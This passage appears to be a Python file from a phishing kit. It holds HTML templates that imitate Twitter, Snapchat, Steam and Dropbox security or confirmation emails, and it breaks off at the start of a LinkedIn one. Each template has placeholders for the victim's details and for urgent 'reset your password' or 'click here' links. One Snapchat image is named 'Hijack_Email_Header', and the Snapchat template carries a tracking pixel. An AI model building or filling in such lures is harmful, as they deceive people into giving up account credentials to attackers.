"twitter": r'''<div bgcolor="#F5F8FA" style="margin:0;padding:0"><table cellpadding="0" cellspacing="0" border="0" width="100%" bgcolor="#F5F8FA" style="background-color:#f5f8fa;padding:0;margin:0;line-height:1px;font-size:1px" class="m_7210276772504823937body_wrapper"><tbody><tr><td align="center" style="padding:0;margin:0;line-height:1px;font-size:1px"><table class="m_7210276772504823937collapse" id="m_7210276772504823937header" align="center" width="448" style="width:448px;padding:0;margin:0;line-height:1px;font-size:1px" bgcolor="#ffffff" cellpadding="0" cellspacing="0" border="0"><tbody><tr><td style="min-width:448px;padding:0;margin:0;line-height:1px;font-size:1px" class="m_7210276772504823937cut"> <img src="https://ci5.googleusercontent.com/proxy/dZihfURYMr4ltOGMmSu7g3JXn4x0ue5ctCYAEwZ-rv1Lx8G77mg5v7CCPyDYzWr4uj2cpj6-5f0-LRFTlHdmZ14PL7dREA1lSKWeXxIwyQjf9Bdb1yJ3JcrK=s0-d-e1-ft#https://ea.twimg.com/email/self_serve/media/spacer-1402696023930.png" style="min-width:448px;height:1px;margin:0;padding:0;display:block;border:none;outline:none" class="CToWUd"> </td></tr></tbody></table> </td></tr><tr><td align="center" style="padding:0;margin:0;line-height:1px;font-size:1px"><table class="m_7210276772504823937collapse" id="m_7210276772504823937header" align="center" width="448" style="width:448px;background-color:#ffffff;padding:0;margin:0;line-height:1px;font-size:1px" bgcolor="#ffffff" cellpadding="0" cellspacing="0" border="0"><tbody><tr><td colspan="3" height="24" style="height:24px;padding:0;margin:0;line-height:1px;font-size:1px" class="m_7210276772504823937logo_space"> </td></tr><tr align="right"><td width="24" class="m_7210276772504823937margin" style="padding:0;margin:0;line-height:1px;font-size:1px"></td><td align="right" style="padding:0;margin:0;line-height:1px;font-size:1px"> <a href="#m_7210276772504823937_" style="text-decoration:none;border-style:none;border:0;padding:0;margin:0"> <img width="32" align="right" src="https://ci6.googleusercontent.com/proxy/7uJiuTOo6rMk0ahEnEhjXzhKVdtkt-IgM_uCWBYJd8SjMK2uFYPnfc9tFTdYP-OAHBQWBjjS-gNGUpaW67od9X37iuyFD32VfvDGDyXB1DDj-o0HyZXQdxkFn8uPO3ydU9rPwA=s0-d-e1-ft#https://ea.twimg.com/email/self_serve/media/Twitter_logo_180-1468901451975.png" style="width:32px;margin:0;padding:0;display:block;border:none;outline:none" class="CToWUd"> </a> </td><td width="24" class="m_7210276772504823937margin" style="padding:0;margin:0;line-height:1px;font-size:1px"></td></tr><tr><td colspan="4" height="24" style="height:24px;padding:0;margin:0;line-height:1px;font-size:1px" class="m_7210276772504823937logo_space"> <img width="1" height="1" style="display:block;margin:0;padding:0;display:block;border:none;outline:none" src="https://ci6.googleusercontent.com/proxy/DcPlfaEWAKqTloO57NjmsI2d7aQm9ZJE7V1xVBepiu2RDkg2ScBv6cld0fmGgPGWqlUp2IghtFNnNIr7ap2zdki9k3RW8ftVByQdeahXNIPYHI4WNspFWCV3oCaqQlH8XsU7lG9hTHrZwYJZ_LgibzX_SE10SkLb7KMvaZDd-zrTpRqBQTwZKEa8ZknEgYHIZdakbg=s0-d-e1-ft#https://twitter.com/scribe/ibis?t=1&cn=bG9naW5fbm90aWZpY2F0aW9u&iid=d245d496e25743259b05c4aeaf0b44cf&uid=2356568077&nid=244+20" class="CToWUd"> </td></tr></tbody></table><table class="m_7210276772504823937collapse" id="m_7210276772504823937header" align="center" width="448" style="width:448px;background-color:#ffffff;padding:0;margin:0;line-height:1px;font-size:1px" bgcolor="#ffffff" cellpadding="0" cellspacing="0" border="0"><tbody><tr align="left;"><td width="24" class="m_7210276772504823937margin" style="padding:0;margin:0;line-height:1px;font-size:1px"></td><td align="left;" style="padding:0;margin:0;line-height:1px;font-size:1px"><table class="m_7210276772504823937collapse" cellpadding="0" cellspacing="0" border="0" style="padding:0;margin:0;line-height:1px;font-size:1px"><tbody><tr><td align="left;" class="m_7210276772504823937h2" style="padding:0;margin:0;line-height:1px;font-size:1px;font-family:'HelveticaNeue','Helvetica Neue',Helvetica,Arial,sans-serif;font-size:24px;line-height:32px;font-weight:bold;color:#292f33;text-align:left;text-decoration:none"> We noticed a recent login for your account <a href="" style="text-decoration:none;border-style:none;border:0;padding:0;margin:0;color:#292f33;text-decoration:none" target="_blank">{}</a>. </td></tr><tr><td height="24" style="padding:0;margin:0;line-height:1px;font-size:1px"></td></tr><tr><td style="padding:0;margin:0;line-height:1px;font-size:1px"><table width="100%" align="center" cellspacing="0" border="0" class="m_7210276772504823937collapse" style="padding:0;margin:0;line-height:1px;font-size:1px"><tbody><tr><td width="30" style="width:30px;padding:0;margin:0;line-height:1px;font-size:1px" class="m_7210276772504823937margins"></td><td align="center" style="padding:0;margin:0;line-height:1px;font-size:1px"><table width="100%" align="center" cellpadding="0" cellspacing="0" border="0" class="m_7210276772504823937collapse" style="padding:0;margin:0;line-height:1px;font-size:1px"><tbody><tr><td align="left" width="25%" class="m_7210276772504823937support" style="padding:0;margin:0;line-height:1px;font-size:1px;font-family:'HelveticaNeue','Helvetica Neue',Helvetica,Arial,sans-serif;font-size:14px;line-height:16px;font-weight:400;color:#292f33;text-align:left;text-decoration:none"><strong>Device</strong></td><td width="15" style="width:15px;padding:0;margin:0;line-height:1px;font-size:1px"></td><td align="left" class="m_7210276772504823937support" style="padding:0;margin:0;line-height:1px;font-size:1px;font-family:'HelveticaNeue','Helvetica Neue',Helvetica,Arial,sans-serif;font-size:14px;line-height:16px;font-weight:400;color:#292f33;text-align:left;text-decoration:none">Chrome on Android</td></tr><tr><td align="left" width="25%" class="m_7210276772504823937support" style="padding:0;margin:0;line-height:1px;font-size:1px;font-family:'HelveticaNeue','Helvetica Neue',Helvetica,Arial,sans-serif;font-size:14px;line-height:16px;font-weight:400;color:#292f33;text-align:left;text-decoration:none"><strong>Location</strong></td><td width="15" style="width:15px;padding:0;margin:0;line-height:1px;font-size:1px"></td><td align="left" class="m_7210276772504823937support" style="padding:0;margin:0;line-height:1px;font-size:1px;font-family:'HelveticaNeue','Helvetica Neue',Helvetica,Arial,sans-serif;font-size:14px;line-height:16px;font-weight:400;color:#292f33;text-align:left;text-decoration:none">Near {}, {}</td></tr></tbody></table> </td></tr></tbody></table> </td></tr><tr><td height="24" style="padding:0;margin:0;line-height:1px;font-size:1px"></td></tr><tr><td align="left" class="m_7210276772504823937support" style="padding:0;margin:0;line-height:1px;font-size:1px;font-family:'HelveticaNeue','Helvetica Neue',Helvetica,Arial,sans-serif;font-size:14px;line-height:16px;font-weight:400;color:#292f33;text-align:left;text-decoration:none"> <strong>If this was you:</strong> </td></tr><tr><td height="6" style="padding:0;margin:0;line-height:1px;font-size:1px"></td></tr><tr><td align="left" class="m_7210276772504823937body-text" style="padding:0;margin:0;line-height:1px;font-size:1px;font-family:'HelveticaNeue','Helvetica Neue',Helvetica,Arial,sans-serif;font-size:16px;line-height:20px;font-weight:400;color:#292f33;text-align:left;text-decoration:none"> Great! There's nothing else you need to do. </td></tr><tr><td height="24" style="height:24px;padding:0;margin:0;line-height:1px;font-size:1px"></td></tr><tr><td align="left;" class="m_7210276772504823937support" style="padding:0;margin:0;line-height:1px;font-size:1px;font-family:'HelveticaNeue','Helvetica Neue',Helvetica,Arial,sans-serif;font-size:14px;line-height:16px;font-weight:400;color:#292f33;text-align:left;text-decoration:none"> <strong>If this wasn’t you:</strong> </td></tr><tr><td height="6" style="padding:0;margin:0;line-height:1px;font-size:1px"></td></tr><tr><td align="left;" class="m_7210276772504823937body-text" style="padding:0;margin:0;line-height:1px;font-size:1px;font-family:'HelveticaNeue','Helvetica Neue',Helvetica,Arial,sans-serif;font-size:16px;line-height:20px;font-weight:400;color:#292f33;text-align:left;text-decoration:none"> Your account may have been compromised and you should take a few steps to make sure your account is secure. To start, <a href="{}" style="text-decoration:none;border-style:none;border:0;padding:0;margin:0;border:none;text-decoration:none;font-weight:400;color:#1da1f2" target="_blank">reset your password now</a>. </td></tr><tr><td height="36" style="padding:0;margin:0;line-height:1px;font-size:1px"></td></tr></tbody></table> </td><td width="24" class="m_7210276772504823937margin" style="padding:0;margin:0;line-height:1px;font-size:1px"></td></tr><tr><td height="1" style="line-height:1px;display:block;height:1px;background-color:#f5f8fa;padding:0;margin:0;line-height:1px;font-size:1px"></td><td align="center" style="padding:0;margin:0;line-height:1px;font-size:1px"><table width="100%" align="center" cellpadding="0" cellspacing="0" border="0" class="m_7210276772504823937edu-module" style="padding:0;margin:0;line-height:1px;font-size:1px;background-color:#ffffff;border-radius:5px"><tbody><tr><td height="1" style="line-height:1px;display:block;height:1px;background-color:#f5f8fa;padding:0;margin:0;line-height:1px;font-size:1px"></td></tr></tbody></table> </td><td height="1" style="line-height:1px;display:block;height:1px;background-color:#f5f8fa;padding:0;margin:0;line-height:1px;font-size:1px"></td></tr><tr><td colspan="3" height="24" class="m_7210276772504823937edu-space" style="padding:0;margin:0;line-height:1px;font-size:1px"></td></tr><tr><td width="24" class="m_7210276772504823937edu-margins" style="padding:0;margin:0;line-height:1px;font-size:1px"></td><td align="center" style="padding:0;margin:0;line-height:1px;font-size:1px"><table width="100%" align="center" cellpadding="0" cellspacing="0" border="0" class="m_7210276772504823937edu-module" bgcolor="#F5F8FA" style="padding:0;margin:0;line-height:1px;font-size:1px;background-color:#ffffff;border-radius:5px"><tbody><tr><td align="left" style="padding:0;margin:0;line-height:1px;font-size:1px"><table border="0" cellpadding="0" cellspacing="0" width="100%" style="padding:0;margin:0;line-height:1px;font-size:1px"><tbody><tr><td class="m_7210276772504823937edu-header" style="padding:0;margin:0;line-height:1px;font-size:1px;font-family:'Helvetica Neue',Helvetica,Arial,sans-serif;font-size:16px;line-height:22px;text-align:left;color:#8899a6"> <strong>How do I know an email is from <span class="il">Twitter</span>?</strong> </td></tr><tr><td colspan="3" height="12" style="padding:0;margin:0;line-height:1px;font-size:1px"></td></tr><tr><td class="m_7210276772504823937edu-text" style="padding:0;margin:0;line-height:1px;font-size:1px;font-family:'Helvetica Neue',Helvetica,Arial,sans-serif;font-size:14px;line-height:19px;font-weight:400;text-align:left;color:#8899a6"> Links in this email will start with “<span class="m_7210276772504823937no-link"><a href="#m_7210276772504823937_" style="text-decoration:none;border-style:none;border:0;padding:0;margin:0;color:#8899a6;text-decoration:none">https://</a></span>” and contain “<span class="m_7210276772504823937no-link"><a href="{}" style="text-decoration:none;border-style:none;border:0;padding:0;margin:0;color:#8899a6;text-decoration:none" target="_blank" data-saferedirecturl="https://www.google.com/url?hl=en&q=https://twitter.com/i/redirect?url%3Dhttps%253A%252F%252Ftwitter.com%252F%253Frefsrc%253Demail%26t%3D1%26cn%3DbG9naW5fbm90aWZpY2F0aW9u%26sig%3D5810b2be86b6d2764512337d9cf3ea4d02812789%26iid%3Dd245d496e25743259b05c4aeaf0b44cf%26uid%3D2356568077%26nid%3D244%2B1554&source=gmail&ust=1488768499007000&usg=AFQjCNFX5GJTsk-lhQbDIpjXZSXB0zgDlQ"><span class="il">{}</span>{}</a></span>.” Your browser will also display a padlock icon to let you know a site is secure. </td></tr></tbody></table> </td></tr></tbody></table> </td><td width="24" class="m_7210276772504823937edu-margins" style="padding:0;margin:0;line-height:1px;font-size:1px"></td></tr><tr><td colspan="3" height="24" class="m_7210276772504823937edu-space" style="padding:0;margin:0;line-height:1px;font-size:1px"></td></tr><tr><td height="1" style="line-height:1px;display:block;height:1px;background-color:#f5f8fa;padding:0;margin:0;line-height:1px;font-size:1px"></td><td align="center" style="padding:0;margin:0;line-height:1px;font-size:1px"><table width="100%" align="center" cellpadding="0" cellspacing="0" border="0" class="m_7210276772504823937edu-module" style="padding:0;margin:0;line-height:1px;font-size:1px;background-color:#ffffff;border-radius:5px"><tbody><tr><td height="1" style="line-height:1px;display:block;height:1px;background-color:#f5f8fa;padding:0;margin:0;line-height:1px;font-size:1px"></td></tr></tbody></table> </td><td height="1" style="line-height:1px;display:block;height:1px;background-color:#f5f8fa;padding:0;margin:0;line-height:1px;font-size:1px"></td></tr></tbody></table><table class="m_7210276772504823937collapse" id="m_7210276772504823937footer" align="center" width="448" style="width:448px;background-color:#ffffff;padding:0;margin:0;line-height:1px;font-size:1px" cellpadding="0" cellspacing="0" border="0"><tbody><tr><td height="36" style="height:36px;padding:0;margin:0;line-height:1px;font-size:1px"></td></tr><tr><td align="center" style="padding:0;margin:0;line-height:1px;font-size:1px"> <span class="m_7210276772504823937small-copy" style="font-family:'HelveticaNeue','Helvetica Neue',Helvetica,Arial,sans-serif;font-size:12px;line-height:16px;font-weight:400;color:#8899a6;text-align:left;text-decoration:none"> <a href="https://support.twitter.com/articles/76036" class="m_7210276772504823937small-copy" style="text-decoration:none;border-style:none;border:0;padding:0;margin:0;font-family:'HelveticaNeue','Helvetica Neue',Helvetica,Arial,sans-serif;font-size:12px;line-height:16px;font-weight:400;color:#8899a6;text-align:left;text-decoration:none;font-family:'HelveticaNeue','Helvetica Neue',Helvetica,Arial,sans-serif;font-size:12px;line-height:16px;font-weight:600;color:#1da1f2;text-align:left;text-decoration:none" target="_blank" data-saferedirecturl="https://www.google.com/url?hl=en&q=https://support.twitter.com/articles/76036&source=gmail&ust=1488768499007000&usg=AFQjCNHUCzbUjXfmNAT0B7wamPYK6mFWjQ">Help</a> | <a href="https://twitter.com/i/redirect?url=https%3A%2F%2Fsupport.twitter.com%2Farticles%2F204820-fake-twitter-emails&t=1&cn=bG9naW5fbm90aWZpY2F0aW9u&sig=ee6d8d5439b23c101a3694be6e6989a2ffa94c79&iid=d245d496e25743259b05c4aeaf0b44cf&uid=2356568077&nid=244+1558" class="m_7210276772504823937small-copy" style="text-decoration:none;border-style:none;border:0;padding:0;margin:0;font-family:'HelveticaNeue','Helvetica Neue',Helvetica,Arial,sans-serif;font-size:12px;line-height:16px;font-weight:400;color:#8899a6;text-align:left;text-decoration:none;font-family:'HelveticaNeue','Helvetica Neue',Helvetica,Arial,sans-serif;font-size:12px;line-height:16px;font-weight:600;color:#1da1f2;text-align:left;text-decoration:none" target="_blank" data-saferedirecturl="https://www.google.com/url?hl=en&q=https://twitter.com/i/redirect?url%3Dhttps%253A%252F%252Fsupport.twitter.com%252Farticles%252F204820-fake-twitter-emails%26t%3D1%26cn%3DbG9naW5fbm90aWZpY2F0aW9u%26sig%3Dee6d8d5439b23c101a3694be6e6989a2ffa94c79%26iid%3Dd245d496e25743259b05c4aeaf0b44cf%26uid%3D2356568077%26nid%3D244%2B1558&source=gmail&ust=1488768499007000&usg=AFQjCNHriReOKYKBFgrb1BXxDnBgMcj2aA">Email security tips</a> </span> </td></tr><tr><td height="12" style="height:12px;line-height:1px;font-size:1px;padding:0;margin:0;line-height:1px;font-size:1px"></td></tr><tr><td align="center" style="padding:0;margin:0;line-height:1px;font-size:1px"> <span class="m_7210276772504823937small-copy" style="font-family:'HelveticaNeue','Helvetica Neue',Helvetica,Arial,sans-serif;font-size:12px;line-height:16px;font-weight:400;color:#8899a6;text-align:left;text-decoration:none"> This email was meant for {}</span> </td></tr><tr><td height="6" style="height:6px;line-height:1px;font-size:1px;padding:0;margin:0;line-height:1px;font-size:1px"></td></tr><tr><td align="center" style="padding:0;margin:0;line-height:1px;font-size:1px"> <span class="m_7210276772504823937address"> <a href="#m_7210276772504823937_" style="text-decoration:none;border-style:none;border:0;padding:0;margin:0;font-family:'HelveticaNeue','Helvetica Neue',Helvetica,Arial,sans-serif;color:#8899a6;font-size:12px;padding:0px;margin:0px;font-weight:normal;line-height:12px"><span class="il">Twitter</span>, Inc. 1355 Market Street, Suite 900 San Francisco, CA 94103</a> </span> </td></tr><tr><td height="72" style="height:72px;padding:0;margin:0;line-height:1px;font-size:1px"></td></tr></tbody></table> </td></tr></tbody></table><div class="yj6qo"></div><div class="adL"></div></div>''',
"snapchat": r'''<div style="background-color:#f6f6f6;color:#000000">
<center>
<table style="max-width:620px;border-collapse:collapse;margin:0 auto 0 auto" width="620" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td>
<table style="max-width:580px;padding-left:20px;padding-right:20px" width="580" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr style="height:50px"></tr>
<tr>
<td style="line-height:0" align="center">
<img src="https://storage.googleapis.com/email-media/Hijack_Email_Header.png">
</td>
</tr>
<tr style="background:#ffffff">
<td style="font-family:AvenirNext-Regular,Droid Sans monospace,Roboto,Arial,sans-serif" align="center">
<p style="font-size:45px;color:#000000;letter-spacing:-1.5px">
Just Logged in!</p>
</td>
</tr>
<tr style="background:#ffffff">
<td style="padding-left:20px;padding-right:20px;padding-top:29.8px;font-size:22px;color:#000000;letter-spacing:0;line-height:37px;font-family:AvenirNext-Regular,Droid Sans monospace,Roboto,Arial,sans-serif" border="0" align="left">
<p>
<span style="display:block">Hi {},<br><br>it looks like someone logged in to your account from a device named "<span style="font-family:AvenirNext-DemiBold,'Droid Sans monospace',Roboto,Arial,sans-serif">{}</span>"<span style="font-family:AvenirNext-DemiBold,'Droid Sans monospace',Roboto,Arial,sans-serif"> {} {} 2020 </span><span style="font-family:AvenirNext-DemiBold,'Droid Sans monospace',Roboto,Arial,sans-serif">{} UTC</span>. The login happend somewhere near <span style="font-family:AvenirNext-DemiBold,'Droid Sans monospace',Roboto,Arial,sans-serif">{}</span> (IP = <span style="font-family:AvenirNext-DemiBold,'Droid Sans monospace',Roboto,Arial,sans-serif">{}</span>).<br><br>It this was you, you can ignore this email, you don't need to anything<br><br> If this wasn't you, you should change your password on our support-website: <a target="_blank" href="{}"> here</a>.<br><br>Read more about what you can do if someone tried to login to your account<a target="_blank" href="{}"> here</a>.<br><br>Thanks,<br>Team Snapchat<br></span>
</p>
</td>
</tr>
<tr>
<td align="center">
<img src="https://storage.googleapis.com/email-media/Hijack_Email_Footer.png">
</td>
</tr>
<tr>
<td style="margin-top:0;margin-bottom:0;color:#262626;font-size:17px;padding-top:30px;padding-bottom:70px;letter-spacing:0;line-height:35px;font-family:AvenirNext-Regular,Droid Sans monospace,Roboto,Arial,sans-serif" align="center">
<p>
<span style="display:block">© Snap Inc. 2020 | <a target="_blank" style="text-decoration:none;color:#0eadff" href="{}">Terms</a></span>
<span style="display:block"><a target="_blank" style="text-decoration:none;color:#000000" href="{}">https://support.snapchat.com</a></span>
<span style="display:block">Snap Inc., 2772 Donald Douglas Loop North, Santa Monica, CA 90405</span>
</p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</center>
<img style="height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important" alt src="https://u5086036.ct.sendgrid.net/wf/open?upn=VvqtyfCSnsbcZPFWtKaquJZ-2BerosihiCpLkl7yCVpZzgQ00MHub-2FSDh-2BEZsgW-2FyilgmvQ0BcLyxr6ftpSjaPd-2FycbKM9Lq3cXPsekNzTsDplfPG4isjbwAOW5-2F-2Boh1wzEI2YBcpXAsTtQ8ZmHXE289l9xwWubViino9EGCPomTCHrJyFptWK-2FZDtalbCid2MU-2FUUuqpIRQkO7NJUurSYPtJnF77UuT3YnIUp6v-2FRYc-2FFi20PZHy-2BfNFdTVqxMF8uIfx-2Bkytwtymqv5XGOsZsZhd4mu26xAAmJD4-2BFv17RefEvtVuD5NCpfpb-2BLLjIzXqHbHoQu8pPHz3xh09BH7PUjy1E5I2nZrQ-2FWtrNjZiyg958fJ3n1h-2FPftUyu6Y666cEOifgxQnuKqIUlcQJGw5Mw-3D-3D" width="1" height="1" border="0">
</div>
</div></div>''',
"snapchat_simple": r'''<div style="background-color:#f6f6f6;color:#000000">
<center>
<table style="max-width:620px;border-collapse:collapse;margin:0 auto 0 auto" width="620" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td>
<table style="max-width:580px;padding-left:20px;padding-right:20px" width="580" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td style="line-height:0;padding-top:50px" align="left">
<img src="https://storage.googleapis.com/scan-snapchat.appspot.com/creative-camera/confirm-header.png" style="background:#f6f6f6">
</td>
</tr>
<tr style="background:#ffffff">
<td style="font-family:AvenirNext-Regular,Droid Sans monospace,Roboto,Arial,sans-serif" align="center">
<p style="font-size:45px;color:#000000;letter-spacing:-1.5px">
Confirm your Email?</p>
</td>
</tr>
<tr style="background:#ffffff">
<td style="padding-left:20px;padding-right:20px;padding-top:29.8px;font-size:22px;color:#000000;letter-spacing:0;line-height:37px;font-family:AvenirNext-Regular,Droid Sans monospace,Roboto,Arial,sans-serif" border="0" align="left">
<p>
<span style="display:block">Hi <span style="font-family:AvenirNext-DemiBold,'Droid Sans monospace',Roboto,Arial,sans-serif">{}</span>,</span>
<span style="display:block">Thank you for adding your email address to Snapchat. Confirm your email below so you can reset your account if you forget your password.</span>
</p>
</td>
</tr>
<tr style="background:#ffffff">
<td style="padding-top:10px" align="center">
<a target="_blank" href="{}">
Confirm Your Email address
</a>
</td>
</tr>
<tr style="background:#ffffff">
<td style="padding-left:20px;padding-right:20px;padding-top:29.8px;font-size:22px;color:#000000;letter-spacing:0;line-height:37px;font-family:AvenirNext-Regular,Droid Sans monospace,Roboto,Arial,sans-serif" border="0" align="left">
<p style="margin-bottom:0px">If this is not your Snapchat account, or if you did not sign up for Snapchat, please <a target="_blank" href="{}">Click Here</a> to remove your email address from this account.</p>
</td>
</tr>
<tr style="background:#ffffff">
<td style="font-family:AvenirNext-Regular,Droid Sans monospace,Roboto,Arial,sans-serif" align="center">
<p style="font-size:45px;color:#000000;letter-spacing:-1.5px;padding-top:30px">
Happy Snapping!</p>
</td>
</tr>
<tr>
<td align="left">
<img src="https://storage.googleapis.com/scan-snapchat.appspot.com/creative-camera/confirm-footer.png" style="background:#f6f6f6">
</td>
</tr>
<tr>
<td style="margin-top:0;margin-bottom:0;color:#262626;font-size:17px;padding-top:30px;padding-bottom:70px;letter-spacing:0;line-height:35px;font-family:AvenirNext-Regular,Droid Sans monospace,Roboto,Arial,sans-serif" align="center">
<p>
<span style="display:block">© Snap Inc. | <a target="_blank" style="text-decoration:none;color:#0eadff" href="{}">Terms</a></span>
<span style="display:block"><a target="_blank" style="text-decoration:none;color:#000000" href="{}">https://support.snapchat.com</a></span>
<span style="display:block">Snap Inc., 63 Market Street, Venice CA 90291</span>
</p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</center>
</div>
</div></div>''',
"steam": r'''<div style="font-family:Helvetica,Arial,sans-serif;font-size:14px;color:#c6d4df" bgcolor>
<table style="width:538px;background-color:#393836" cellspacing="0" cellpadding="0" align="center">
<tbody><tr>
<td style="height:65px;background-color:#171a21;border-bottom:1px solid #4d4b48">
<img alt="Steam" src="https://help.steampowered.com/public/shared/images/email/email_header_logo.png" width="538" height="65">
</td>
</tr>
<tr>
<td bgcolor="#17212e">
<table style="padding-left:5px;padding-right:5px" width="470" cellspacing="0" cellpadding="0" border="0" align="center">
<tbody><tr bgcolor="#17212e">
<td style="padding-top:32px">
<span style="font-size:24px;color:#66c0f4;font-family:Arial,Helvetica,sans-serif;font-weight:bold">
Hello {} </span>
<br>
<div style="padding-top:12px">
<span style="font-size:17px;color:#c6d4df;font-family:Arial,Helvetica,sans-serif;font-weight:bold">
You got a new message from the Steam-team </span>
</div>
</td>
</tr>
<tr><td style="height:20px;line-height:20px"> </td></tr>
<tr>
<td>
<table style="padding:14px" width="458" cellspacing="0" cellpadding="0" border="0" bgcolor="#121a25" align="center">
<tbody><tr>
<td>
<a target="_blank" href="{}" style="color:#67c1f5">
Click here to show the message </a>
</td>
</tr>
</tbody></table>
</td>
</tr>
<tr>
<td style="font-size:12px;color:#c6d4df;padding-top:16px">
This is an automatic email and replies will not be read. If you want to update your request, use the link below to do so. </td>
</tr>
<tr>
<td style="font-size:12px;color:#6d7880;padding-top:16px;padding-bottom:60px">
Steam support<br>
<a target="_blank" href="{}" style="color:#8f98a0">https://help.steampowered.com/</a><br>
</td>
</tr>
</tbody></table>
</td>
</tr>
<tr style="background-color:#000000">
<td style="padding:12px 24px">
<table cellspacing="0" cellpadding="0">
<tbody><tr>
<td width="92">
<img alt="Valve®" src="https://help.steampowered.com/public/shared/images/email/footerLogo_valve.png" width="96" height="26">
</td>
<td style="font-size:11px;color:#595959;padding-left:12px">
© Valve Corporation. PO Box 1688 Bellevue, WA 98009.<br>
All Rights Reserved. All trademarks are the property of their respective owners in the United States and other countries. </td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</div>
</div></div>''',
"dropbox": r'''<div style="padding:0;width:100%!important;margin:0"><center><table style="padding:0;width:100%!important;background:#ffffff;margin:0;background-color:#ffffff" cellspacing="0" cellpadding="8" border="0"><tbody><tr><td valign="top">
<table style="border-radius:4px;border:1px #dceaf5 solid" cellspacing="0" cellpadding="0" border="0" align="center">
<tbody><tr><td colspan="3" height="6"></td></tr>
<tr style="line-height:0px"><td style="font-size:0px" width="100%" height="1" align="center"><img alt style="max-height:73px;width:40px" src="https://cfl.dropboxstatic.com/static/images/emails/logo_glyph_34_m1%402x.png" width="40px"></td></tr> <tr><td><table style="line-height:25px" cellspacing="0" cellpadding="0" border="0" align="center">
<tbody><tr><td colspan="3" height="30"></td></tr>
<tr>
<td width="36"></td>
<td style="color:#444444;border-collapse:collapse;font-size:11pt;font-family:proxima_nova,'Open Sans','Lucida Grande','Segoe UI',Arial,Verdana,'Lucida Sans Unicode',Tahoma,'Sans Serif';max-width:454px" width="454" valign="top" align="left">Hello {}! <br><br> A new browser just signed in to your dropbox-account. Too keep your account secure we want to know if this was you. <br><br><table style="border-radius:4px;width:100%!important;background:#e8f2fa">
<tbody><tr>
<td height="16px"></td>
<td height="16px"></td>
<td height="16px"></td>
</tr>
<tr>
<td width="20px"></td>
<td>
<span style="color:#444;text-align:center"> <b> Is this you?</b> </span><table style="color:#444;font-size:14px" cellspacing="0" cellpadding="0" border="0" align="center">
<tbody><tr>
<td height="10px"></td>
<td height="10px"></td>
</tr>
<tr valign="top">
<td width="90px">when:</td>
<td><b>{} {}, {} at {} (CET)</b></td>
</tr>
<tr valign="top">
<td width="90px">What:</td>
<td><b>{} on {}</b></td>
</tr>
<tr>
<td height="16px"></td>
<td height="16px"></td>
</tr>
</tbody></table>
<table style="text-align:center" cellspacing="0" cellpadding="0" border="0" align="center"><tbody><tr>
<td width="124px"><a target="_blank" href="{}" style="border-radius:3px;font-size:14px;border-right:1px #b1b1b1 solid;border-bottom:1px #aaaaaa solid;padding:7px 7px 7px 7px;border-top:1px #bfbfbf solid;max-width:97px;font-family:proxima_nova,'Open Sans','lucida grande','Segoe UI',arial,verdana,'lucida sans unicode',tahoma,sans-serif;color:#777777;text-align:center;background-image:-webkit-gradient(linear,0% 0%,0% 100%,from(rgb(251,251,251)),to(rgb(228,228,228)));text-decoration:none;width:97px;border-left:1px #b1b1b1 solid;margin:0;display:block;background-color:#f3f3f3">Yes</a></td>
<td></td>
<td width="124px" height="0px"><a target="_blank" href="{}" style="border-radius:3px;font-size:14px;border-right:1px #b1b1b1 solid;border-bottom:1px #aaaaaa solid;padding:7px 7px 7px 7px;border-top:1px #bfbfbf solid;max-width:97px;font-family:proxima_nova,'Open Sans','lucida grande','Segoe UI',arial,verdana,'lucida sans unicode',tahoma,sans-serif;color:#777777;text-align:center;background-image:-webkit-gradient(linear,0% 0%,0% 100%,from(rgb(251,251,251)),to(rgb(228,228,228)));text-decoration:none;width:97px;border-left:1px #b1b1b1 solid;margin:0;display:block;background-color:#f3f3f3">No</a></td>
</tr></tbody></table>
<table style="text-align:left" cellspacing="0" cellpadding="0" border="0" align="left"><tbody><tr align="left">
<td width="97px" height="0px"><br></td>
<td width="0px" height="0px"><br></td>
</tr></tbody></table>
<br> <a target="_blank" href="{}">Im not sure</a> <br>
</td>
<td width="20px"></td>
</tr>
<tr>
<td height="20px"></td>
<td height="20px"></td>
<td height="20px"></td>
</tr>
</tbody></table>
<br> More info about how you can <a target="_blank" href="{}">Protect you account</a>. <br> <br> Thanks! <br>Dropbox-team <br>
</td>
<td width="36"></td>
</tr>
<tr><td colspan="3" height="36"></td></tr>
</tbody></table></td></tr>
</tbody></table>
<table cellspacing="0" cellpadding="0" border="0" align="center">
<tbody><tr><td height="10"></td></tr>
<tr><td style="padding:0;border-collapse:collapse"><table cellspacing="0" cellpadding="0" border="0" align="center"><tbody><tr style="color:#a8b9c6;font-size:11px;font-family:proxima_nova,'Open Sans','Lucida Grande','Segoe UI',Arial,Verdana,'Lucida Sans Unicode',Tahoma,'Sans Serif'">
<td width="400" align="left"></td>
<td width="128" align="right">© Dropbox</td>
</tr></tbody></table></td></tr>
</tbody></table>
</td></tr></tbody></table></center></div>
<img src="https://www.dropbox.com/l/AAAeocKSq3j4e1E1qWMhxN1x8RA31ZltPZ4" width="1" height="1"></div></div>''',
"linkedin": r'''<div style="overflow: hidden; color: transparent; visibility: hidden; mso-hide: all; width: 0; font-size: 0; opacity: 0; height: 0;">Confirm your identity.</div>
<table style="background-color: #edf0f3; table-layout: fixed; -webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;" role="presentation" border="0" width="100%" cellspacing="0" cellpadding="0" align="center" bgcolor="#EDF0F3">
<tbody>
<tr>
<td style="-webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;" align="center"><center style="width: 100%;">
<table style="background-color: #ffffff; margin: 0 auto; max-width: 512px; -webkit-text-size-adjust: 100%; mso-table-rspace: 0pt; width: inherit; mso-table-lspace: 0pt; -ms-text-size-adjust: 100%;" role="presentation" border="0" width="512" cellspacing="0" cellpadding="0" bgcolor="#FFFFFF">
<tbody>
<tr>
